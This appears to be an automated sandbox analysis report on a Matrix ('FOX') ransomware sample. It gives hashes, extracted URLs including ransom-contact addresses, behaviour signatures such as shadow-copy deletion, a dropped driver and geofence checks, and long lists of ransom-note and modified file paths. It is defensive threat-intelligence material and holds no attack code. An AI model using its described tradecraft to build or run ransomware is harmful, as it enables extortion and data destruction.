Analysis
-
max time kernel
85s -
max time network
93s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
13-07-2023 23:23
Static task
static1
Behavioral task
behavioral1
Sample
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20230703-en
General
-
Target
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
-
Size
1.2MB
-
MD5
76b640aa00354e46b29ca7ac2adfd732
-
SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b
-
SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
-
SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
-
SSDEEP
24576:l/SA+2lraRrjSJR5ezmT1dM9tZBrPyvaNn:zXlabPyyN
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-ma\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Microsoft Office\root\rsod\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft\Edge\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\es-es\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 154 1636 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS deNx4JD364.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" deNx4JD364.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 3 IoCs
pid Process 4288 NWpUUoXa.exe 5356 deNx4JD3.exe 5372 deNx4JD364.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 5084 takeown.exe -
resource yara_rule behavioral2/files/0x00060000000230e0-2312.dat upx behavioral2/memory/5356-2322-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/files/0x00060000000230e0-2517.dat upx behavioral2/memory/5356-7150-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: deNx4JD364.exe File opened (read-only) \??\Y: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\T: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\O: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\G: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\A: deNx4JD364.exe File opened (read-only) \??\E: deNx4JD364.exe File opened (read-only) \??\H: deNx4JD364.exe File opened (read-only) \??\V: deNx4JD364.exe File opened (read-only) \??\S: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\I: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\J: deNx4JD364.exe File opened (read-only) \??\L: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\K: deNx4JD364.exe File opened (read-only) \??\T: deNx4JD364.exe File opened (read-only) \??\U: deNx4JD364.exe File opened (read-only) \??\U: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\P: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\E: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\R: deNx4JD364.exe File opened (read-only) \??\Z: deNx4JD364.exe File opened (read-only) \??\R: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\Q: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\J: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\B: deNx4JD364.exe File opened (read-only) \??\G: deNx4JD364.exe File opened (read-only) \??\Q: deNx4JD364.exe File opened (read-only) \??\X: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\H: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\I: deNx4JD364.exe File opened (read-only) \??\L: deNx4JD364.exe File opened (read-only) \??\N: deNx4JD364.exe File opened (read-only) \??\P: deNx4JD364.exe File opened (read-only) \??\Z: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\N: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\M: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\K: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\M: deNx4JD364.exe File opened (read-only) \??\S: deNx4JD364.exe File opened (read-only) \??\W: deNx4JD364.exe File opened (read-only) \??\W: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\V: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\X: deNx4JD364.exe File opened (read-only) \??\Y: deNx4JD364.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 153 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\SLqXTAxH.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription5-ul-oob.xrm-ms 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-180.png 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pl_get.svg 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner.svg 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover_2x.png 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProDemoR_BypassTrial180-ppd.xrm-ms 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\HeartbeatConfig.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\external_extensions.json 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\autofill_labeling_features_email.txt 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ppd.xrm-ms 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\cldrdata.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-io.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\ui-strings.js 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\index_poster.jpg 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Trial-pl.xrm-ms 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int.gif 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\ui-strings.js 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\ui-strings.js 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main-selector.css 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet II.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\#FOX_README#.rtf 